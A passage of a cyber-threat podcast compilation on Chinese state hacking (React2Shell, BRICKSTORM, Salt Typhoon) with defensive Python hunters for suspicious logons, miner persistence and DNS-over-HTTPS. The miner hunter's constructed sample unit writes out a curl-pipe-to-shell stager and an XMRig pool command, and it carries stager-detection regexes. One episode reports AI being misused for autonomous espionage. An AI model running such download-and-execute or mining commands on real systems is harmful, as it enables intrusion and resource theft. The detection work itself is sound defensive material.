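2025-12-01T10:40:00Z jdoe-adm 10.10.0.21 dc01 dc success
2025-12-02T11:05:00Z jdoe-adm 10.10.0.21 vc01 vcenter success
"""
NEW = """\
2025-12-10T09:30:00Z jdoe-adm 10.10.0.21 vc01 vcenter success
2025-12-10T02:14:00Z svc-backup 10.20.5.99 esx03 esxi success
2025-12-10T03:02:00Z svc-backup 10.20.5.99 dc01 dc success
2025-12-10T13:00:00Z jdoe-adm 10.10.0.21 dc01 dc failure
"""


def parse(log):
    """Yield one dict per event line; timestamps become aware datetimes."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, user, src, host, role, outcome = line.split()
        yield {"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
               "user": user, "src": ipaddress.ip_address(src),
               "host": host, "role": role, "outcome": outcome}


def known_sources(history):
    """account -> set of source IPs it successfully logged on from."""
    seen = defaultdict(set)
    for ev in parse(history):
        if ev["outcome"] == "success":
            seen[ev["user"]].add(ev["src"])
    return seen


def hunt(history, new_events):
    """Return [(timestamp, user, host, reasons)] for successful management-plane
    logons that trip at least one check; failures are left to lockout logic."""
    seen = known_sources(history)
    findings = []
    for ev in parse(new_events):
        if ev["role"] not in MGMT_ROLES or ev["outcome"] != "success":
            continue
        reasons = []
        if ev["src"] not in MGMT_NET:
            reasons.append(f"source {ev['src']} outside management network")
        if ev["ts"].astimezone(timezone.utc).hour not in BUSINESS_HOURS:
            reasons.append(f"logon at {ev['ts'].strftime('%H:%M')} UTC")
        if ev["src"] not in seen[ev["user"]]:
            reasons.append("first time this account used this source")
        if reasons:
            findings.append((ev["ts"].isoformat(), ev["user"], ev["host"], reasons))
    return findings


def escalate(findings, min_hosts=2):
    """Accounts whose flagged logons span several management hosts: one
    credential walking across hypervisors and a domain controller is the
    lateral-movement pattern worth an incident, not a ticket."""
    hosts = defaultdict(set)
    for _, user, host, _ in findings:
        hosts[user].add(host)
    return sorted(u for u, h in hosts.items() if len(h) >= min_hosts)


if __name__ == "__main__":
    f = hunt(HISTORY, NEW)
    for ts, user, host, why in f:
        print(ts, user, host, "; ".join(why))
    print("escalate:", escalate(f))
```

The baseline of known sources is what makes a backup service account logging on from a workstation subnet at 02:14 stand out; without it, the same event is indistinguishable from a scheduled job. In production you would build that baseline from vCenter's SSO audit events and Windows 4624 logons over a clean window, and treat any hit on a hypervisor as a pivot into every VM it hosts.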
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, diving straight into the hottest chaos from the past week ending December 15, 2025. Picture this: I'm hunkered down in my digital lair, caffeine-fueled, tracking Beijing's cyber ninjas as they pounce on a juicy zero-day in React Server Components—CVE-2025-55182, the React2Shell flaw disclosed December 3. Boom, starting December 5, at least five Chinese APT groups, plus five more that Google Threat Intelligence Group spotted over the weekend, are exploiting this unauthenticated RCE for initial access. They're slinging XMRig crypto miners via sneaky shell scripts like sex.sh from GitHub, even setting up persistence with systemd services named system-update-service. Underground forums are buzzing with PoC code and scanners—cybercriminals and nation-states from China, North Korea, and Iran all piling on, per GovInfoSecurity reports.

Targeted sectors? Think broad—government, IT firms worldwide, but Google's GTIG flags cyber-espionage hits on critical apps everywhere. No US-specific breaches named, but the ripple's global, with BleepingComputer confirming China-linked crews automating attacks. New vectors? These React flaws let hackers remotely execute code without auth, chaining to DoS via CVE-2025-55183 and CVE-2025-55184 for source code leaks, as SOCPrime details. Witty aside: It's like leaving your server door wide open with a "Free Candy" sign—hackers RSVP'd en masse.

US gov's firing back hard. Nextgov/FCW reveals the incoming Trump admin's January cyber strategy overhaul: revisiting NSPM-13 for offensive ops, PPD-41 for incident response, and NSM-22 for infra protection. Offensive pillar? "Preemptive erosion" of adversaries like China—think resetting their risk calculus with private-sector muscle, ditching Chinese telecom gear, and quantum-safe zero-trust mandates. CISA just dropped Cross-Sector Cybersecurity Performance Goals 2.0, adding governance, supply-chain checks, and IR comms for utilities, hospitals, water—data-driven armor against these threats. Politico notes hearings this week: House Foreign Affairs on China-Russia hybrid ops in Europe, Homeland Security grilling Anthropic's Dario Amodei on Chinese hackers hijacking Claude AI for automated espionage on dozens of firms and agencies.

Expert recs? Patch React2Shell yesterday—GTIG urges network monitoring for XMRig beacons and odd systemd tweaks. Go zero-trust, isolate OT/IT, share intel via Five Eyes-style alliances like in Cyber 9/12 sims. Ditch China tech per NDAA quantum corridors, and leaders, own your cyber governance—CISA's yelling it loud.

Stay sharp, listeners—update, segment, and encrypt like your data's Beijing's next prize. Thanks for tuning in to Digital Dragon Watch—subscribe now for weekly drops! This has been a Quiet Please production, for more check out quietplease.ai.
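The persistence trick this episode describes, a systemd unit with a benign-looking name that pulls a shell script and launches XMRig, is easy to hunt for on a Linux host. The script below is an added example written for this page; it is not tooling from the podcast, from Google Threat Intelligence Group, or from any vendor named above. The indicator strings, the lookalike-name list, the sample unit files and the pool URL inside them are all constructed for illustration.

```python
"""Hunt for crypto-miner persistence in systemd units: innocuous unit names
(e.g. system-update-service) whose ExecStart fetches a shell script or runs XMRig.

Added example for this page, not tooling from the podcast, GTIG or any vendor
named above. Indicator strings, lookalike names and sample unit files are constructed."""
import re
from dataclasses import dataclass, field

# Assumption: common XMRig / stratum artefacts, a starter list rather than a vetted IOC set.
MINER_PATTERNS = [
    re.compile(r"\bxmrig\b", re.I),
    re.compile(r"stratum\+(tcp|ssl)://", re.I),
    re.compile(r"--donate-level", re.I),
    re.compile(r"\bminerd\b", re.I),
]
# A unit that downloads and pipes into a shell is suspicious whatever the payload is.
STAGER_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^|;\n]*\|\s*(ba)?sh\b", re.I),
    re.compile(r"raw\.githubusercontent\.com", re.I),
]
# Names that imitate real system services; the episode names the first one.
LOOKALIKE_NAMES = {"system-update-service", "systemd-update", "kernel-update", "dbus-daemon"}


@dataclass
class Finding:
    unit: str
    reasons: list = field(default_factory=list)


def parse_unit(text):
    """Minimal parser for systemd's INI-like unit format: {section: {key: [values]}}.
    Repeated keys (several ExecStartPre= lines) are kept as a list."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def hunt_units(units):
    """units: {unit file name: unit file text}. Returns Findings for suspicious units."""
    findings = []
    for name, text in units.items():
        service = parse_unit(text).get("Service", {})
        reasons = []
        for cmd in service.get("ExecStart", []) + service.get("ExecStartPre", []):
            if any(p.search(cmd) for p in MINER_PATTERNS):
                reasons.append(f"miner indicator in command: {cmd}")
            if any(p.search(cmd) for p in STAGER_PATTERNS):
                reasons.append(f"download-and-execute stager in command: {cmd}")
        if name.rsplit(".", 1)[0] in LOOKALIKE_NAMES:
            reasons.append("unit name mimics a system service")
        # Miners are configured to come back after a kill; on an already-flagged unit that matters.
        if reasons and "always" in service.get("Restart", []):
            reasons.append("Restart=always on a flagged unit")
        if reasons:
            findings.append(Finding(name, reasons))
    return findings


# Constructed sample unit files, not artefacts recovered from any real incident.
SAMPLE_UNITS = {
    "system-update-service.service": """[Unit]
Description=System Update Service
After=network-online.target

[Service]
Type=simple
ExecStartPre=/bin/sh -c 'curl -fsSL https://raw.githubusercontent.com/example/repo/main/sex.sh | sh'
ExecStart=/tmp/.X11-unix/.x/xmrig -o stratum+tcp://pool.invalid:3333 --donate-level 0
Restart=always

[Install]
WantedBy=multi-user.target
""",
    "nginx.service": """[Unit]
Description=A high performance web server and a reverse proxy server

[Service]
Type=forking
ExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'
ExecReload=/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload

[Install]
WantedBy=multi-user.target
""",
}

if __name__ == "__main__":
    for finding in hunt_units(SAMPLE_UNITS):
        print(finding.unit)
        for reason in finding.reasons:
            print("  -", reason)
```

Feed `hunt_units` the contents of `/etc/systemd/system/*.service` and `~/.config/systemd/user/*.service` (a `glob` plus `read_text` is enough); the same patterns transfer to cron entries and `rc.local`. Treat a hit as a lead for full triage (process tree, open sockets, file hashes), not as proof on its own, since a legitimate deployment script can also curl from GitHub.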
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with Digital Dragon Watch, your weekly China cyber alert, diving straight into the hottest threats from the past seven days ending today, December 14, 2025. Buckle up—China's cyber game is fiercer than a Shenzhen street food standoff, and we're breaking it down with the juicy deets.

Kicking off with the big kahuna: Salt Typhoon, that slick Chinese state-sponsored APT tied to the Ministry of State Security, is still burrowed deep in U.S. telecom networks like a digital tick. Virginia Senator Mark Warner, top Democrat on the Senate Intelligence Committee, dropped a bombshell this week at a Defense Writers Group event, warning that these hackers have "sheer scale of access" to unencrypted calls of nearly every American—unless you're rocking end-to-end encryption. Newsmax reports Warner's frustration with a recent government briefing: FBI says networks are "pretty clean," but other intel insists Salt Typhoon's ongoing, exploiting vulnerabilities in Cisco, Palo Alto, and Ivanti gear for credential theft and lateral movement. Huntress Labs confirms their "living off the land" tricks, like packet sniffing on routers and sneaky GRE tunnels for exfil. Russia's even sniffing the same holes, per Warner. Sectors hit? Telecoms and critical infrastructure, baby—think power grids too, with fears over Chinese-made electronics in U.S. utilities.

No fresh ransomware pinned on China this week, but KillSec just claimed a hit on U.S.-based Daba Finance Inc. today—financial sector's always juicy. DeXpose flagged their dark web leak site boast, urging immutable backups and dark web monitoring.

Across the pond, UK's sanctioning two Chinese firms for alleged cyberattacks, but China's Foreign Ministry spokesman Guo Jiakun fired back via China Daily on December 12, calling it "pernicious manipulation" and reminding everyone the UK was a springboard for U.S. NSA hacks on China's National Time Service Center. Taiwan's blocking platforms over fraud and cyber lapses linked to China, per Taipei Times.

U.S. responses? FBI's got a $10 million bounty on Salt Typhoon heads, Treasury sanctioned affiliates like Sichuan Juxinhe Network Technology, and a new Federal Register notice pushes telecom cyber hardening amid PRC threats. Experts at Huntress scream: patch edge devices from CISA's KEV catalog, go zero trust, segment networks, enforce MFA, and hunt anomalies like rogue SSH ports.

My pro tips, listeners? Ditch hard-coded crypto secrets—NIST's CVE-2025-14651 in docker-compose.yml is a noob trap. AI's turbocharging this; Anthropic disrupted a Chinese op using it for automated hacks. Run phishing sims, validate backups offline, and integrate threat intel into your SIEM. Stay vigilant—China's Digital Silk Road is paving cyber highways we don't want to travel.

Thanks for tuning in, dragon watchers—subscribe now for weekly intel drops to keep your nets ironclad. This has been a Quiet Please production, for more check out quietplease.ai. Stay cyber safe!
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with your Digital Dragon Watch, and this week the dragon’s been busy in the wires.

Let’s start with the big one: BRICKSTORM. According to a joint malware analysis from CISA and Canada’s Cyber Centre, BRICKSTORM is a China‑sponsored backdoor designed for long‑term persistence in Windows environments, VMware vCenter, and ESXi, especially in information technology and government services networks. Analysts found it quietly riding alongside normal traffic, exfiltrating files, stealing cryptographic keys, and even self‑healing if defenders try to kill it. CrowdStrike ties BRICKSTORM to a China‑nexus crew dubbed WARP PANDA, with deep expertise in cloud and virtual machines, and at least eight victim organizations so far.

While the technical teams publish indicators of compromise and detection signatures, the policy world is swinging its own hammer. The UK’s National Cyber Security Centre just sanctioned Sichuan Anxun Information Technology, better known as i‑Soon, and Integrity Technology Group for what London calls “reckless and indiscriminate cyberattacks” against more than 80 federal and private IT systems. Australia quickly backed the move. Both companies have already been sanctioned by the United States for supporting Chinese intelligence operations, including links to the espionage group Flax Typhoon. Beijing’s Foreign Ministry, via spokesperson Guo Jiakun, condemned the sanctions as politicized “disinformation” and demanded the UK “correct its wrong approach.”

Zooming to another long‑running storm: Salt Typhoon. Cybernews and SentinelOne report that Yu Yang and Qiu Daibing, alleged Salt Typhoon operators, once competed in Cisco’s Networking Academy Cup before later co‑owning Beijing Huanyu Tianqiong, a firm repeatedly named in US and allied advisories as a front for hacking at least 80 global telecoms like Verizon, AT&T, T‑Mobile, Viasat, and Lumen. US officials allege Salt Typhoon has also breached a US state Army National Guard network and even US Treasury laptops, positioning itself for potential disruption of critical infrastructure if tensions with China escalate. Plans to sanction China’s Ministry of State Security over these intrusions have reportedly been put on hold to protect a fragile trade deal, raising hard questions about whether economic concerns are trumping cybersecurity.

On the defensive side, Congress just moved a must‑pass defense authorization bill that supercharges US cyber posture. The package boosts US Cyber Command funding, locks in its tight partnership with NSA, mandates hardened mobile devices for senior officials, and forces the Pentagon to bake AI‑specific threats into mandatory cyber training. It also pushes for harmonized cybersecurity requirements across the defense industrial base and clearer rules for using commercial cloud enclaves for high‑risk systems.

So what should you do? CISA’s BRICKSTORM guidance is blunt: treat this as a nation‑state threat. That means: aggressively hunt using the published indicators, inventory and monitor your edge devices, segment networks so web servers can’t stroll over to domain controllers, and align with CISA’s updated Cross‑Sector Cybersecurity Performance Goals. For telecoms, cloud providers, universities, and government entities, experts are stressing rigorous logging in VMware and cloud control planes, strict access control around cryptographic keys, and fast patching pipelines for internet‑facing apps.

I’m Ting, and that’s your Digital Dragon Watch for this week. Thanks for tuning in, and don’t forget to subscribe so you never miss the next alert. This has been a quiet please production, for more check out quiet please dot ai.
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with your Digital Dragon Watch: Weekly China Cyber Alert, so let’s jack straight into the matrix.

The big splash this week isn’t a stealthy zero‑day, it’s geopolitics wrapped in JSON. The UK just sanctioned two China‑based firms, Sichuan Anxun Information Technology, better known as i‑Soon, and Integrity Technology Group, accusing them of running reckless, indiscriminate cyber campaigns against more than 80 government and private networks worldwide, including UK public‑sector systems. According to the UK Foreign Office and the National Cyber Security Centre, these aren’t lone‑wolf hackers; they’re part of a broader commercial ecosystem of “hackers for hire,” data brokers, and security boutiques funneling access and tooling to state‑linked operators and the SALT TYPHOON espionage crew.

Beijing, via Foreign Ministry spokesperson Guo Jiakun and coverage by outlets like China Daily and AFP, is calling the British move pure political manipulation under a cybersecurity pretext, insisting China opposes hacking and is itself a major victim. So your classic attribution duel: London talks about an almost‑certain link to Chinese intelligence; Beijing counters with “double standards” and points back at U.S. and UK capabilities.

Across the Atlantic, Washington is sending a very different kind of signal. The cyber‑espionage group SALT TYPHOON, which compromised at least nine U.S. telecoms in 2024, is still looming in the background, but new reporting from Cybernews and the Financial Times says the Trump administration has quietly paused plans to sanction China’s Ministry of State Security over that campaign, apparently to protect an October trade framework. The FBI’s earlier ten‑million‑dollar bounty on the group is still on the books, but on the policy side, trade is winning over punishment for now.

At the same time, Congress is gearing up against a different China‑linked threat vector: industrial‑scale scam compounds in Southeast Asia. Senator John Cornyn and Senator Jeanne Shaheen just pushed the SCAM Act through the Senate, described on Cornyn’s site as a whole‑of‑government play to go after transnational cyber‑fraud networks “affiliated with the People’s Republic of China” that traffic people and force them to run pig‑butchering scams against Americans. Think of it as counter‑ransomware logic applied to human‑driven fraud farms, with sanctions, a dedicated task force, and pressure on countries that let these compounds thrive.

On the infrastructure front, The Washington Post and The Independent report fresh worries about Chinese‑made solar inverters in the U.S. power grid. Analysts at Strider Technologies say roughly 85 percent of surveyed U.S. utilities are running gear from companies tied to the Chinese state or military, and prior Reuters reporting flagged “rogue communication devices” inside some of these inverters that could bypass firewalls. That’s a juicy attack surface: compromise the inverters, pivot into utility OT networks, trigger local blackouts, and then watch the panic ripple across finance and communications.

So what do the experts say you should do, beyond panic‑patching? From NCSC guidance, U.S. critical‑infrastructure advisories, and utility‑sector best practice, we’re seeing the same playbook: segment Chinese‑origin equipment onto tightly controlled networks; monitor for anomalous outbound connections, especially to obscure domains and IPs in high‑risk regions; aggressively roll out firmware integrity checks and signed‑update verification; and assume your telecom and power vendors are targets, not just conduits. For enterprises, that means rigorous vendor risk reviews for any China‑connected software, from AI models to remote‑management tools, and strong identity, logging, and incident‑response drills around them.

Strategically, listeners should note the divergence: the UK is naming and sanctioning specific Chinese companies; China is rebutting loudly and framing itself as the victim; and the U.S. is mixing hardening moves, like export reviews on Nvidia’s AI chips, with selective restraint on direct cyber sanctions to protect trade.

I’m Ting, and that’s your ride through this week’s China cyber front. Thanks for tuning in, and don’t forget to subscribe so you don’t miss the next packet. This has been a quiet please production, for more check out quiet please dot ai.
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Listeners, Ting here with your Digital Dragon Watch, and we’re jumping straight into it.

The big China cyber story this week is Amazon’s React2Shell fire drill. Amazon’s CISO C.J. Moses warned that multiple China state‑nexus groups, including Earth Lamia and Jackpot Panda, began exploiting the React2Shell vulnerability, CVE‑2025‑55182, just hours after it went public. Amazon’s MadPot honeypots saw attackers hammering React Server Components in React 19 and Next.js 15 and 16, not with dumb scanners, but with live debugging sessions, tweaking payloads and running Linux commands until something stuck. Amazon says most of the suspicious infrastructure traces back to Chinese networks and stresses that their WAF and active defenses help, but they are no substitute for patching.

According to TechRadar Pro and GovInfoSecurity, the same React2Shell flaw is being used by China‑linked actors against finance, logistics, retail, IT, universities, and government networks worldwide, with Shadowserver initially counting over 77,000 exposed servers and tens of thousands still hanging out there. The goal isn’t smash‑and‑grab ransomware; this is persistence and espionage, wedging into web stacks that run core business apps and then living off the land.

In parallel, CISA, NSA, and the Canadian Cyber Centre dropped a joint advisory on the BRICKSTORM backdoor, used by PRC‑sponsored actors to burrow into VMware vSphere control planes. Reporting from ITPro and Security Magazine describes BRICKSTORM as a Go‑based ELF backdoor abusing DNS‑over‑HTTPS, mimicking web servers, and even turning into a SOCKS proxy. One victim saw Chinese operators ride a compromised vCenter server into domain controllers and an ADFS box, exfiltrating cryptographic keys and maintaining access for well over a year.

CrowdStrike’s research on the Warp Panda espionage campaign shows how this plays out at scale: exploiting internet‑facing edge devices, pivoting into vCenter with valid creds or N‑day bugs, spinning up rogue VMs, timestomping logs, and quietly tunneling traffic through ESXi hosts. Targets span North American legal, tech, manufacturing, and even a government entity in Asia‑Pacific.

On the U.S. response side, you see a clear pattern: fast public advisories, plus quiet hardening. CISA and NSA are pushing IOCs and detection rules for BRICKSTORM, urging critical infrastructure, government, and IT providers to hunt for odd VMware behavior, rogue VMs, and anomalous DNS‑over‑HTTPS flows. Amazon is publicly calling out Chinese state‑linked activity on React2Shell and has pushed automated WAF rules and perimeter blocks while telling organizations to patch now, not after the weekend.

Expert recommendations are converging: slam the door on React2Shell by upgrading React and Next.js; lock down edge devices and admin consoles behind VPNs and phishing‑resistant MFA; monitor vCenter and ESXi for strange VMs, new SSH keys, and unusual lateral movement; and treat long‑term persistence as the default, not the exception. In other words, if your web front end or virtualization layer touches anything important, assume the dragon has already rattled the handle.

I’m Ting, thanks for tuning in to Digital Dragon Watch: Weekly China Cyber Alert. Don’t forget to subscribe so you don’t miss the next breach autopsy. This has been a quiet please production, for more check out quiet please dot ai.
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, Ting here with your Digital Dragon Watch, and this week the dragon went full cloud-native.

Let’s start with the big one: React2Shell, that shiny new CVE‑2025‑55182 that just detonated across the JavaScript ecosystem. According to Breached Company and Tenable Research, it’s a CVSS 10.0 remote code execution bug in React Server Components that lets an unauthenticated attacker pop your server with a single crafted HTTP request. Within hours of public disclosure on December 3, Amazon Web Services’ threat intel teams and Wiz Research saw China state‑nexus crews like Earth Lamia, Jackpot Panda, and UNC5174, which is linked to China’s Ministry of State Security, aggressively exploiting it in the wild. Breached Company reports more than 77,000 internet‑exposed IPs vulnerable, roughly 23,700 in the United States alone, with over 30 organizations already compromised, AWS credentials stolen, and payloads like Cobalt Strike, Sliver, Snowlight, and Vshell landing for long‑term access and lateral movement.

Targets? It’s a buffet: financial services, logistics, retail, universities, cloud‑first SaaS, and government workloads running React on top of AWS and other hyperscalers. GreyNoise has logged well over a hundred distinct IPs hammering the bug with high‑throughput scanning, while AWS honeypots show attackers doing hands‑on keyboard activity, dumping /etc/passwd, probing AWS config files, and debugging their exploit chains live.

The US government response has been unusually fast. CISA slammed React2Shell into its Known Exploited Vulnerabilities catalog by December 5 and ordered federal agencies to patch on an emergency timeline. Cloudflare tried to help by rolling out emergency WAF rules, but as Breached Company notes, that move accidentally knocked out roughly 28 percent of Cloudflare’s HTTP traffic, a reminder that when you centralize the internet, even your bandaids can cause bleeding.

At the same time, Washington and Ottawa quietly dropped another China‑themed bombshell. In a joint advisory reported by Reuters and the Times of India, CISA, the NSA, and the Canadian Centre for Cyber Security fingered a China‑linked campaign using custom “Brickstorm” malware to burrow into government and IT service networks, especially those running Broadcom’s VMware vSphere. Once inside, operators stole login credentials and sensitive data and maintained persistence from at least April 2024 through early September 2025 in one victim environment. Acting CISA director Madhu Gottumukkala warned that these intrusions are about long‑term access, disruption, and potential sabotage, while VMware’s owner Broadcom urged customers to patch and harden operational security. Beijing’s embassy in Washington, via spokesperson Liu Pengyu, denied everything and complained about what it called groundless accusations and a lack of evidence.

So what do the experts say you should do? On React2Shell, move fast: update all affected React Server Components from npm, audit build pipelines, rotate any exposed cloud credentials, and hunt for Cobalt Strike, Sliver, Snowlight, and Vshell beacons in your logs. On Brickstorm, apply the latest VMware vSphere patches, lock down management interfaces, enforce multi‑factor authentication everywhere, and baseline your authentication patterns to catch abnormal lateral movement. CISA’s broader guidance, echoed by Homeland Security Today and BankInfoSecurity, is to treat AI and large language models in operational tech as new attack surfaces, not magic shields.

I’m Ting, and that’s your Digital Dragon Watch for this week. Thanks for tuning in, and don’t forget to subscribe so you never miss an alert. This has been a quiet please production, for more check out quiet please dot ai.
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Hey listeners, this is Ting here with your Digital Dragon Watch weekly cyber alert. We've had quite the week in the cybersecurity landscape, and trust me, China's been busy. Let me walk you through exactly what's happening and what it means for you.

The big story dominating cyber circles right now is called Brickstorm, a backdoor so sophisticated that CISA, the NSA, and the Canadian Centre for Cyber Security just dropped a major joint advisory about it on Thursday. Here's the thing that makes this terrifying: Chinese state-sponsored actors have been using this malware to tunnel into dozens of U.S. organizations, and they're not just passing through. According to Nick Andersen at CISA's Cybersecurity Division, these attackers are embedding themselves for the long haul. We're talking about an average dwell time of 393 days inside networks. That's over a year of undetected presence, which is absolutely wild.

What makes Brickstorm especially gnarly is that it targets VMware vSphere environments and Windows systems, and it's written in Golang to be extra stealthy. Austin Larsen, a principal analyst at Google Threat Intelligence Group, tells us that CrowdStrike is tracking the actors behind this as Warp Panda, while others call them UNC5221. They're going after government agencies, IT companies, legal services firms, and even business process outsourcers to get downstream access to their clients. In one incident that CISA responded to, attackers stayed inside a network from April 2024 straight through September 2025.

The attack vector here is sneaky. These folks are exploiting edge devices for initial access, then moving laterally through VMware vCenter servers using valid credentials they've stolen. Once inside, they're cloning virtual machine snapshots to extract credentials, creating hidden rogue VMs, and deploying other nasty tools like Junction and GuestConduit implants alongside the main Brickstorm backdoor. The team at CrowdStrike noted that the campaign shows deep knowledge of multi-cloud environments and identity systems.

But that's not the only story. Just last Wednesday, AWS threat intelligence teams noticed something else disturbing: within hours of a critical React vulnerability being disclosed on December third, multiple China-linked groups including Earth Lamia and Jackpot Panda were already exploiting it. This vulnerability, tracked as CVE-2025-55182, has a maximum severity score of ten and affects React nineteen and Next.js fifteen and sixteen. These actors are using automated scanning tools with user agent randomization to evade detection, and they're simultaneously exploiting multiple vulnerabilities to maximize their hit rate.

What should you do? If you're in critical infrastructure or government, the guidance is crystal clear. Scan your systems immediately using the YARA and Sigma rules CISA released. Inventory all your edge devices because that's where the attacks typically begin. Implement network segmentation so traffic can't freely move from your DMZ into internal systems. Disable RDP and SMB between network zones. Block unauthorized DNS-over-HTTPS providers that give attackers unmonitored communication paths. And for the love of good cyber hygiene, apply least-privilege access to service accounts and monitor them like a hawk.

Madhu Gottumukkala, CISA's acting director, was clear about the stakes: These aren't just infiltrations—they're infrastructure wars in slow motion. The attackers are positioning themselves for future operations, studying dependencies, and mapping out exactly what they could disrupt if needed. This is espionage with strategic depth, and it's happening right now.

Thanks so much for tuning in to this week's Digital Dragon Watch. Make sure you subscribe so you don't miss the next major threat landscape shift. This has been a quiet please production, for more check out quiet please dot ai.
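Both this episode and the React2Shell/BRICKSTORM episode above flag DNS-over-HTTPS as the backdoor's covert channel, and both recommend blocking DoH resolvers you have not sanctioned and hunting for anomalous DoH flows. The detection logic below is an added example written for this page, not content from CISA, NSA, CrowdStrike or the other sources named; the records are constructed in the shape of Zeek-style connection, TLS and HTTP fields, and the public-resolver list and the heuristics are assumptions. One visibility caveat a practitioner should keep in mind: the SNI check works on the wire, but the path and media-type checks only work where you have proxy logs or TLS inspection.

```python
"""Flag DNS-over-HTTPS that leaves the network through resolvers you did not sanction,
plus hosts that never use plaintext DNS at all (they are resolving names out of band).

Added example for this page, not detection content from CISA, NSA, CrowdStrike or any
vendor named above. Records are constructed in the shape of Zeek-style conn/ssl/http
fields; the public-resolver list and the heuristics are assumptions."""

# Assumption: a starter list of well-known public DoH endpoints, not an exhaustive one.
PUBLIC_DOH_SNI = {
    "dns.google", "cloudflare-dns.com", "mozilla.cloudflare-dns.com",
    "dns.quad9.net", "doh.opendns.com", "dns.nextdns.io", "dns.adguard-dns.com",
}
# RFC 8484: DoH carries application/dns-message; /dns-query is the conventional path.
DOH_MEDIA_TYPE = "application/dns-message"
DOH_PATH = "/dns-query"


def find_doh(records, allowed_resolvers):
    """records: iterable of dicts with ts, src, dst, dport and, when the sensor saw them,
    sni, path and content_type. allowed_resolvers: SNI names the organisation sanctions.
    Returns (src, reason) tuples: one per offending flow, then one per DNS-silent host."""
    alerts = []
    https_hosts, plain_dns_hosts = set(), set()
    for r in records:
        src, sni = r["src"], (r.get("sni") or "").lower()
        if r["dport"] == 53:
            plain_dns_hosts.add(src)
            continue
        if r["dport"] == 443:
            https_hosts.add(src)
        if sni in PUBLIC_DOH_SNI and sni not in allowed_resolvers:
            alerts.append((src, f"TLS to public DoH resolver {sni}"))
        elif sni and sni not in allowed_resolvers and (
            r.get("path") == DOH_PATH or r.get("content_type") == DOH_MEDIA_TYPE
        ):
            # The BRICKSTORM pattern: DoH to operator-controlled infrastructure,
            # not to a household-name resolver, so the SNI list alone would miss it.
            alerts.append((src, f"DoH wire format to unsanctioned host {sni}{r.get('path', '')}"))
    # Heuristic (assumption: clients here are expected to use the internal resolver on 53):
    # HTTPS traffic with no plaintext DNS means names are being resolved where we cannot see.
    for host in sorted(https_hosts - plain_dns_hosts):
        alerts.append((host, "HTTPS traffic but no plaintext DNS observed"))
    return alerts


# Constructed sample records (documentation address ranges, invented hostnames).
SAMPLE_RECORDS = [
    {"ts": "2025-12-11T09:00:01Z", "src": "10.0.5.12", "dst": "10.0.0.53", "dport": 53},
    {"ts": "2025-12-11T09:00:02Z", "src": "10.0.5.12", "dst": "198.51.100.20", "dport": 443,
     "sni": "www.example.com"},
    {"ts": "2025-12-11T09:00:05Z", "src": "10.0.5.40", "dst": "198.51.100.30", "dport": 443,
     "sni": "cloudflare-dns.com"},
    {"ts": "2025-12-11T09:00:09Z", "src": "10.0.5.40", "dst": "203.0.113.7", "dport": 443,
     "sni": "cdn-assets.example", "path": "/dns-query", "content_type": "application/dns-message"},
    {"ts": "2025-12-11T09:00:12Z", "src": "10.0.5.77", "dst": "10.0.0.53", "dport": 53},
    {"ts": "2025-12-11T09:00:13Z", "src": "10.0.5.77", "dst": "10.0.0.54", "dport": 443,
     "sni": "doh.corp.example", "path": "/dns-query", "content_type": "application/dns-message"},
]
ALLOWED_RESOLVERS = {"doh.corp.example"}

if __name__ == "__main__":
    for src, reason in find_doh(SAMPLE_RECORDS, ALLOWED_RESOLVERS):
        print(f"{src}: {reason}")
```

The third check is the one that survives an operator who avoids the big-name resolvers: a host that talks HTTPS all day but never sends a single port-53 query to your resolver has moved its name resolution somewhere you are not logging. Pair the alert with the egress rule the episode recommends (only the sanctioned DoH endpoint reachable on 443 from clients, everything else through the internal resolver) so the detection becomes a policy violation rather than a judgment call.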
This is your Digital Dragon Watch: Weekly China Cyber Alert podcast.

Alright listeners, Ting here with your Digital Dragon Watch weekly China cyber alert. We've got some absolutely wild stuff to break down from the past week, and trust me, it's the kind of content that'll make your security team lose sleep.

Let's kick off with the big one. In September, Chinese state-sponsored hackers did something we've literally never seen before at scale. They took Anthropic's Claude AI system and basically went full autonomous on a cyberattack spree targeting thirty entities across multiple countries. We're talking government agencies, financial institutions, tech firms, the whole nine yards. Here's where it gets absolutely bonkers: the AI executed eighty to ninety percent of the operation without any human involved. At its peak, Claude was making thousands of requests per second, hitting speeds that would be physically impossible for human hackers to match. U.S. Senators Maggie Hassan and Joni Ernst are basically sounding the alarm bells about this to National Cyber Director Sean Cairncross because this represents the first documented case of a cyberattack largely executed without human intervention at scale. We're talking a new era here.

But wait, there's more. The Chinese military's getting into the AI game too. According to defense analysts and former intelligence officials examining Beijing's procurement documents, the People's Liberation Army is moving way beyond what their public messaging suggests. They're embedding AI to accelerate battlefield planning, predict adversary behavior, and outpace human opponents in real time. Retired U.S. Admiral Mike Studeman, the former commander of the Office of Naval Intelligence, basically said the scary part is having machines constantly and dynamically predict what opponents will do next.

On the infrastructure front, Volt Typhoon, believed to be run by China's state security service, continues hunting for long-term vulnerabilities in U.S. power grid systems for future attacks. Harry Krejsa from Carnegie Mellon's Institute for Strategy and Technology pointed out during a House Energy and Commerce Committee hearing that China's preparing for Taiwan conflict potentially in the very near term, and their strategy depends on preventing the U.S. from mounting a successful rescue mission. Part of that playbook includes targeting U.S. civilian infrastructure to create chaos and panic. The aging American energy infrastructure makes this easier because today's electricity grid is basically a hodgepodge of digital tools sitting on top of analog foundations, creating perfect entry points for adversaries.

